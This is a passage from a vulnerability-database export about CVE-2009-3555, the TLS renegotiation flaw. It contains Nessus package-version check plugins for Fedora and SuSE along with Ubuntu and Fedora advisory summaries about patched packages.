CVE-2009-3555.\nhttp://tomcat.apache.org/native-doc/miscellaneous/changelog-1.1.x.html\nhttp://marc.info/?l=tomcat-dev&m=125900987921402&w=2\nhttp://marc.info/?l =tomcat-dev&m=125874793414940&w=2\nhttp://marc.info/?l=tomcat- user&m=125874793614950&w=2\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://marc.info/?l\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l\"\n );\n # http://marc.info/?l=tomcat-\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=tomcat-\"\n );\n # http://marc.info/?l=tomcat-dev&m=125900987921402&w=2\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=tomcat-dev&m=125900987921402&w=2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://tomcat.apache.org/native-doc/miscellaneous/changelog-1.1.x.html\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-December/032829.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bff3c0cc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tomcat-native package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:tomcat-native\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2009/11/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^11([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 11.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC11\", reference:\"tomcat-native-1.1.18-1.fc11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat-native\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T14:44:20", "description": "IBM Java 1.4.2 was updated to version U13 FP 4 iFixes to fix the SSL\nrenegotiation flaw reported as CVE-2009-3555, as well as SAP installer\nrelated bugs.", "edition": 23, "published": "2012-05-17T00:00:00", "title": "SuSE 10 Security Update : IBM Java 1.4.2 (ZYPP Patch Number 7036)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "modified": "2012-05-17T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_JAVA-1_4_2-IBM-7036.NASL", "href": "https://www.tenable.com/plugins/nessus/59119", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59119);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3555\");\n\n script_name(english:\"SuSE 10 Security Update : IBM Java 1.4.2 (ZYPP Patch Number 7036)\");\n script_summary(english:\"Checks rpm output for the updated 
packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"IBM Java 1.4.2 was updated to version U13 FP 4 iFixes to fix the SSL\nrenegotiation flaw reported as CVE-2009-3555, as well as SAP installer\nrelated bugs.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3555.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 7036.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been 
implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"java-1_4_2-ibm-1.4.2_sr13.4-1.5.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"java-1_4_2-ibm-devel-1.4.2_sr13.4-1.5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-12T10:08:55", "description": "Add implementation of the safe renegotiation extension to fix the\nCVE-2009-3555 security vulnerability.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2010-07-01T00:00:00", "title": "Fedora 13 : gnutls-2.8.6-2.fc13 (2010-9518)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "modified": "2010-07-01T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:gnutls", "cpe:/o:fedoraproject:fedora:13"], "id": "FEDORA_2010-9518.NASL", "href": "https://www.tenable.com/plugins/nessus/47539", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2010-9518.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(47539);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-3555\");\n script_xref(name:\"FEDORA\", value:\"2010-9518\");\n\n script_name(english:\"Fedora 13 : gnutls-2.8.6-2.fc13 (2010-9518)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n 
script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Add implementation of the safe renegotiation extension to fix the\nCVE-2009-3555 security vulnerability.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=533125\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2010-June/043275.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?752e4185\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected gnutls package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gnutls\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:13\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/06/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^13([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 13.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC13\", reference:\"gnutls-2.8.6-2.fc13\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gnutls\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T14:43:25", "description": "The TLS/SSLv3 protocol as implemented in openssl prior to this update\nwas not able to associate data to a renegotiated connection. This\nallowed man-in-the-middle attackers to inject HTTP requests in a HTTPS\nsession without being noticed. For example Apache's mod_ssl was\nvulnerable to this kind of attack because it uses openssl. 
Please note\nthat renegotiation will be disabled by this update and may cause\nproblems in some cases. (CVE-2009-3555: CVSS v2 Base Score: 6.4)", "edition": 24, "published": "2010-10-11T00:00:00", "title": "SuSE 10 Security Update : OpenSSL (ZYPP Patch Number 6657)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "modified": "2010-10-11T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_COMPAT-OPENSSL097G-6657.NASL", "href": "https://www.tenable.com/plugins/nessus/49839", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(49839);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3555\");\n\n script_name(english:\"SuSE 10 Security Update : OpenSSL (ZYPP Patch Number 6657)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The TLS/SSLv3 protocol as implemented in openssl prior to this update\nwas not able to associate data to a renegotiated connection. This\nallowed man-in-the-middle attackers to inject HTTP requests in a HTTPS\nsession without being noticed. For example Apache's mod_ssl was\nvulnerable to this kind of attack because it uses openssl. Please note\nthat renegotiation will be disabled by this update and may cause\nproblems in some cases. 
(CVE-2009-3555: CVSS v2 Base Score: 6.4)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3555.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6657.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"compat-openssl097g-0.9.7g-13.19.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"x86_64\", reference:\"compat-openssl097g-32bit-0.9.7g-13.19.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, 
reference:\"compat-openssl097g-0.9.7g-13.19.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"compat-openssl097g-32bit-0.9.7g-13.19.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-17T14:07:16", "description": "This update fixes the safe renegotiation testing code which was\nmissing in the previous update for CVE-2009-3555.", "edition": 24, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : gnutls (openSUSE-SU-2010:1025-2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3555"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libgnutls-extra26", "p-cpe:/a:novell:opensuse:libgnutls26", "p-cpe:/a:novell:opensuse:libgnutls26-32bit", "p-cpe:/a:novell:opensuse:gnutls", "p-cpe:/a:novell:opensuse:libgnutls-devel", "cpe:/o:novell:opensuse:11.3", "p-cpe:/a:novell:opensuse:libgnutls-extra-devel"], "id": "SUSE_11_3_GNUTLS-101206.NASL", "href": "https://www.tenable.com/plugins/nessus/75522", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update gnutls-3647.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75522);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3555\");\n\n script_name(english:\"openSUSE Security Update : gnutls (openSUSE-SU-2010:1025-2)\");\n script_summary(english:\"Check for the gnutls-3647 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is 
missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the safe renegotiation testing code which was\nmissing in the previous update for CVE-2009-3555.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=554084\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-12/msg00051.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected gnutls packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:gnutls\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls-extra-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls-extra26\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls26\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgnutls26-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.3\", reference:\"gnutls-2.8.6-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libgnutls-devel-2.8.6-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libgnutls-extra-devel-2.8.6-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libgnutls-extra26-2.8.6-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", reference:\"libgnutls26-2.8.6-2.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.3\", cpu:\"x86_64\", reference:\"libgnutls26-32bit-2.8.6-2.5.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gnutls\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-09T01:31:52", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "USN-927-1 
fixed vulnerabilities in nss in Ubuntu 9.10. This update provides \nthe corresponding updates for Ubuntu 8.04 LTS.\n\nOriginal advisory details:\n\nMarsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3 \nprotocols. If an attacker could perform a man in the middle attack at the \nstart of a TLS connection, the attacker could inject arbitrary content at \nthe beginning of the user's session. This update adds support for the new \nrenegotiation extension and will use it when the server supports it.", "edition": 5, "modified": "2010-06-29T00:00:00", "published": "2010-06-29T00:00:00", "id": "USN-927-4", "href": "https://ubuntu.com/security/notices/USN-927-4", "title": "nss vulnerability", "type": "ubuntu", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-07-09T00:29:17", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "Marsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3 \nprotocols. If an attacker could perform a man in the middle attack at the \nstart of a TLS connection, the attacker could inject arbitrary content at \nthe beginning of the user's session. This update adds backported support \nfor the new RFC5746 renegotiation extension and will use it when both the \nclient and the server support it.\n\nATTENTION: After applying this update, a patched server will allow both \npatched and unpatched clients to connect, but unpatched clients will not be \nable to renegotiate. 
For more information, please refer to the following: \n<http://www.openssl.org/docs/ssl/SSL_CTX_set_options.html#SECURE_RENEGOTIATION>", "edition": 5, "modified": "2010-09-21T00:00:00", "published": "2010-09-21T00:00:00", "id": "USN-990-1", "href": "https://ubuntu.com/security/notices/USN-990-1", "title": "OpenSSL vulnerability", "type": "ubuntu", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-07-09T00:21:09", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "USN-860-1 introduced a partial workaround to Apache that disabled client \ninitiated TLS renegotiation in order to mitigate CVE-2009-3555. USN-990-1 \nintroduced the new RFC5746 renegotiation extension in openssl, and \ncompletely resolves the issue.\n\nAfter updating openssl, an Apache server will allow both patched and \nunpatched web browsers to connect, but unpatched browsers will not be able \nto renegotiate. This update introduces the new SSLInsecureRenegotiation \ndirective for Apache that may be used to re-enable insecure renegotiations \nwith unpatched web browsers. For more information, please refer to: \n<http://httpd.apache.org/docs/2.2/mod/mod_ssl.html#sslinsecurerenegotiation>\n\nOriginal advisory details:\n\nMarsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3 \nprotocols. If an attacker could perform a man in the middle attack at the \nstart of a TLS connection, the attacker could inject arbitrary content at \nthe beginning of the user's session. 
This update adds backported support \nfor the new RFC5746 renegotiation extension and will use it when both the \nclient and the server support it.", "edition": 5, "modified": "2010-09-21T00:00:00", "published": "2010-09-21T00:00:00", "id": "USN-990-2", "href": "https://ubuntu.com/security/notices/USN-990-2", "title": "Apache vulnerability", "type": "ubuntu", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-07-09T01:31:24", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "USN-927-4 fixed vulnerabilities in NSS. This update provides the NSPR \nneeded to use the new NSS.\n\nOriginal advisory details:\n\nMarsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3 \nprotocols. If an attacker could perform a man in the middle attack at the \nstart of a TLS connection, the attacker could inject arbitrary content at \nthe beginning of the user's session. This update adds support for the new \nrenegotiation extension and will use it when the server supports it.", "edition": 15, "modified": "2010-06-29T00:00:00", "published": "2010-06-29T00:00:00", "id": "USN-927-5", "href": "https://ubuntu.com/security/notices/USN-927-5", "title": "nspr update", "type": "ubuntu", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "Utilities for Network Security Services and the Softoken module ", "modified": "2009-12-10T04:13:15", "published": "2009-12-10T04:13:15", "id": "FEDORA:0C0C510F85F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 12 Update: nss-util-3.12.5-1.fc12.1", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "Network Security Services (NSS) is a set of libraries designed to support cross-platform development of security-enabled client and 
server applications. Applications built with NSS can support SSL v2 and v3, TLS, PKCS #5, PKCS #7, PKCS #11, PKCS #12, S/MIME, X.509 v3 certificates, and other security standards. ", "modified": "2010-03-11T13:25:20", "published": "2010-03-11T13:25:20", "id": "FEDORA:0FD0F10F8DA", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 13 Update: nss-3.12.6-1.2.fc13", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "Tomcat can use the Apache Portable Runtime to provide superior scalability, performance, and better integration with native server technologies. The Apache Portable Runtime is a highly portable library that is at the heart of Apache HTTP Server 2.x. APR has many uses, including access to advanced IO functionality (such as sendfile, epoll and OpenSSL), OS level functionality (random number generation, system status, etc), and native process handling (shared memory, NT pipes and Unix sockets). This package contains the Tomcat native library which provides support for using APR in Tomcat. ", "modified": "2009-12-18T04:35:37", "published": "2009-12-18T04:35:37", "id": "FEDORA:1B80628EDC8", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 12 Update: tomcat-native-1.1.18-1.fc12", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3555"], "description": "GnuTLS is a project that aims to develop a library which provides a secure layer, over a reliable transport layer. Currently the GnuTLS library implements the proposed standards by the IETF's TLS working group. 
